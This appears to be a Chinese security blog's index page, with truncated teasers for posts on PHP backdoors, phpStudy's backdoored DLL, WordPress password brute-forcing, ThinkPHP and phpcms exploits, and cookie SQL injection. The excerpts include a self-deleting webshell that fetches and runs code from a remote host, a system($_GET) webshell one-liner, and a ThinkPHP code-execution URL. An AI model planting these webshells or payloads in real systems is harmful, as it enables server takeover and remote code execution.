phpStudy后门分析

问题概要 有问题的版本如下 phpStudy20180211版本 php5.4.45与php5.2.17 ext扩展文件夹下的php_xmlrpc.dll phpStudy20161103版本 php5.4.45与php5.2.17 ext扩展文件夹下的php_xmlrpc.dll 注:这两个官网下载的版本里,都没有发现php5.3版本下存在有问题的php_xmlrpc.dll,打开时会提示存在p...

- 阅读全文 -

PHP 无文件后门

  webshell.php <?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $remote_file = 'http://xsser.me/webshel.txt'; while($code = file_get_contents($remote_file...

- 阅读全文 -

最新WordPress账号密码暴力破解脚本

  在做渗透测试的时候,有时候会遇到一个wordpress博客, 如果版本比较新,插件也没有漏洞的话,可以爆破用户名密码来尝试下。 大脑混沌情况下写的,有bug欢迎提出,由于是php的所以跑起来比较慢, 下次发包还是调用命令结合hydra来爆破。 原理是通过URL /?author= 遍历获取用户名, 然后先跑用户名与密码相同的用户, 再调用同目录下pass.txt中的密码文件进行爆破。...

- 阅读全文 -

PHP 5.4 内置web服务器

PHP是一种脚本语言,它需要PHP解释器来分析运行PHP文件。当把PHP做为CGI服务Web请求时,它需要被嵌入到某种Web服务器里,最常见的是集成到Apache或IIS里,这就是说,在使用PHP前,你需要安装Apache或IIS,并且正确的配置它们和PHP集成的参数。虽然这种配置已经很规范,文档非常丰富,但我们还是经常在安装Apache和PHP集成时遇到问题,而且,有时候我们只想测试一个简单的P...

- 阅读全文 -

thinkphp 3.0 爆路径漏洞

1. thinkphp3.0 模块加载失败,出错信息爆应用程序路径。 检测有两种情况 1. 可执行命令,这个估计是伪3.0版本? 交大定票 此站到可以执行命令 http://webshell.cc/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D 可查看版本 http://webshell.cc/index.php/module...

- 阅读全文 -

关于php后门的编写

0x1 原理 1、执行系统命令的函数 proc_open, popen, exec, shell_exec,passthru,system 这里只给出两个例子,其他的可以查看php手册编写   system() <?php system($_GET['input']); ?> http://192.168.247.133:81/shell.php?input=dir &nbs...

- 阅读全文 -

PHP+MYSQL环境下的Cookies爆错注入实战

PHP+MYSQL环境下的Cookies爆错注入实战,混世魔王。 技巧源于技术,所以你在浏览混世魔王的技术博客的时候,会发现技术形式的文章居多,而且都还算详细,而技巧形式的文章,绝大多数是装逼标题党,内容都点到为止。技术形式的文章,你能看懂并发现问题,大家可以针对某个技术问题深入探讨研究,提升你我的技术,还可能会交到志同道合的朋友,而技巧形式的属于比较急功近利,用的人多了,结果只会被人滥用到死。 ...

- 阅读全文 -

phpcms 2008多个漏洞 (可getshell)

一个漏洞不可怕,可怕的是一连串的漏洞,拼接起来就可以getshell了。 ###文件包含 <?php define('IN_YP', TRUE); define('ADMIN_ROOT', str_replace("", '/',dirname(__FILE__)).'/'); require '../include/common.inc.php'; ## 要登陆 if(!$_userid)...

- 阅读全文 -